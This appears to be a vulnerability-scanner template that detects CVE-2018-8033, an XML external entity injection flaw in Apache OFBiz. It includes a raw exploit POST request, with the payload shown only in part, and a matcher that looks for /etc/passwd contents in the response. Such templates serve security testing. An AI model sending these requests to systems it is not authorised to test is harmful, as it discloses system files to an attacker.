id: CVE-2018-8033 info: name: Apache OFBiz 16.11.04 - XML Entity Injection author: pikpikcu severity: high description: | Apache OFBiz 16.11.04 is susceptible to XML external entity injection (XXE injection). impact: | Successful exploitation of this vulnerability could lead to information disclosure, denial of service. remediation: | Apply the necessary patches or upgrade to a non-vulnerable version of Apache OFBiz. reference: - https://lists.apache.org/thread.html/e8fb551e86e901932081f81ee9985bb72052b4d412f23d89b1282777@%3Cuser.ofbiz.apache.org%3E - https://nvd.nist.gov/vuln/detail/CVE-2018-8033 - https://lists.apache.org/thread.html/e8fb551e86e901932081f81ee9985bb72052b4d412f23d89b1282777%40%3Cuser.ofbiz.apache.org%3E - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-8033 cwe-id: CWE-200 epss-score: 0.00813 epss-percentile: 0.79933 cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache product: ofbiz tags: cve,cve2018,apache,ofbiz,xxe http: - raw: - | POST /webtools/control/xmlrpc HTTP/1.1 Host: {{Hostname}} Accept: */* Accept-Language: en Content-Type: application/xml ]>&disclose; matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - type: status status: - 200 # digest: 4a0a00473045022062cc73f37776eddd17ba93f340a74c854fcb0d63ccce933e38e93b5554ac63e302210093659bd14155ce9221b05c3f4988c1a6c86fd2019d70af7dc28d9233ad49234b:922c64590222798bb761d5b6d8e72950